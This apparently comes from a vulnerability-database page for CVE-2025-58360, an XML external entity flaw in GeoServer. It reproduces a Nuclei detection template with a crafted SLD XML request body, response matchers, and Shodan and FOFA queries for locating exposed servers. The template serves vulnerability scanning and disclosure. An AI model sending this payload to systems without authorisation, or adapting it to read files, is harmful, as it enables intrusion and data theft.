CVE-2025-58360: GeoServer - XML External Entity Injection

日期: 2025-12-02 | 影响软件: GeoServer | POC: 已公开

漏洞描述

GeoServer 2.26.0 to 2.26.2 and 2.25.6 contains an XML External Entity (XXE) injection caused by insufficient sanitization of XML input in /geoserver/wms GetMap operation, letting attackers disclose files or cause DoS, exploit requires crafted XML input.

PoC代码[已公开]

id: CVE-2025-58360

info:
  name: GeoServer - XML External Entity Injection
  author: lbb,xbow,darses
  severity: high
  description: |
    GeoServer 2.26.0 to 2.26.2 and 2.25.6 contains an XML External Entity (XXE) injection caused by insufficient sanitization of XML input in /geoserver/wms GetMap operation, letting attackers disclose files or cause DoS, exploit requires crafted XML input.
  impact: |
    Attackers can disclose sensitive files or cause denial of service by exploiting XML external entity processing.
  remediation: |
    Update to GeoServer 2.25.6, 2.26.3, 2.27.0 or later.
  reference:
    - https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
    - https://nvd.nist.gov/vuln/detail/CVE-2025-58360
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
    cvss-score: 8.2
    cve-id: CVE-2025-58360
    epss-score: 0.12057
    epss-percentile: 0.93527
    cwe-id: CWE-611
  metadata:
    verified: true
    max-request: 2
    vendor: osgeo
    product: geoserver
    shodan-query:
      - title:"geoserver"
      - 'http.html_hash:1093634893 "Content-Disposition: inline"'
      - http.favicon.hash:97540678
      - html:"/geoserver/"
    fofa-query:
      - title="geoserver"
      - app="geoserver"
      - icon_hash="97540678"
      - body="/geoserver/"
  tags: cve,cve2025,geoserver,xxe,wms,vkev,kev

http:
  - method: POST
    path:
      - "{{BaseURL}}/geoserver/wfs?service=WMS&request=GetMap"
      - "{{BaseURL}}/wfs?service=WMS&request=GetMap"

    headers:
      Content-Type: application/vnd.ogc.sld+xml

    body: |
      <?xml version="1.0" encoding="UTF-8"?>
      <!DOCTYPE root [ <!ENTITY xxe SYSTEM "/this_file_does_not_exist"> ]>
      <StyledLayerDescriptor version="1.0.0">
      <NamedLayer><Name>&xxe;</Name></NamedLayer>
      </StyledLayerDescriptor>

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "ServiceException"
          - "java.io.FileNotFoundException"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022005e4e5a3be5828879b7cadb24c5d7a9d9660e51d88037acd25396e06e9bea6610221009071df8ef12b64a23aaf7bbc00ea5fd31e0c749fb3005b27d33328561793c1bc:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-58360.yaml

相关漏洞推荐